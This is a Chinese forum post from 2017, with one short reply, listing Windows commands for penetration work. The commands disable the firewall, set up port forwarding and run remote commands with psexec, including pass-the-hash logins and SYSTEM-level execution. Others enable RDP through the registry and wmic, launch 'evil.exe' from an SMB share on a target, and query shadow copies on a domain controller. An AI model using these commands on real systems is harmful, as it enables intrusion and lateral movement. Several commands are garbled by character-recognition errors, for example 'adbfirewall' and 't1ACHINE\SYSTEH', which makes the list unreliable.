查看: 232|回复: 1

[系统安全] windows环境渗透中常用系统命令

[复制链接]
  • TA的每日心情

    2017-8-30 00:55
  • 签到天数: 5 天

    连续签到: 5 天

    [LV.2]偶尔看看I

    发表于 2017-8-28 00:19:45 | 显示全部楼层 |阅读模式
    禁用windows防火墙
    netsh advfirewall set currentprofile state off
    netsh adbfirewall set all profiles state off

    本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发
    启用转发
    netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
    停止转发
    netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

    psexec的一些用法

    执行远程主机上上的文件或者命令
    psexec /acceptula \\targetip -u domain\user -p password -c -f \\smbip \share\file.exe

    #注意,第一次执行psexec一定要带aaceptula参数,否则会弹出一个确认对话框,在命令行下是没办法结束的

    利用用户hash来登录远程主机并执行命令
    psexec /acceptula \\ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

    以system权限来执行远程命令
    psexec /accepteula \\ip -s md.exe

    修改注册表开启windows终端服务
    reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    wmi命令用法详解

    使用用户名密码通过smb来执行远程主机上的命令或者文件
    wmic /node: targetiP /user:domain\user /password:password process call create "\\ smbiP \share\evil.exe”

    卸载软件
    wmic product get name /value  # 获取软件名称
    wmic product where name=11XXX" call uninstall /nointeractive

    判定远程登录用户
    wmic /node:remotecomputer computersystern get username

    实时获取远程主机进程
    wmic /node:machinename process list brief /every:1

    开启远程rdp
    wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
    AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

    列举用户登录时长
    wmic netlogin where (name like "%adm%") get numberoflogons

    卷影拷贝服务
    wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”
  • TA的每日心情
    奋斗
    2018-1-13 01:07
  • 签到天数: 178 天

    连续签到: 1 天

    [LV.7]常住居民III

    查看他的品牌

    发表于 2017-8-30 18:54:02 | 显示全部楼层
    如果是转发文章,请在标题注明
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    站长推荐上一条 /1 下一条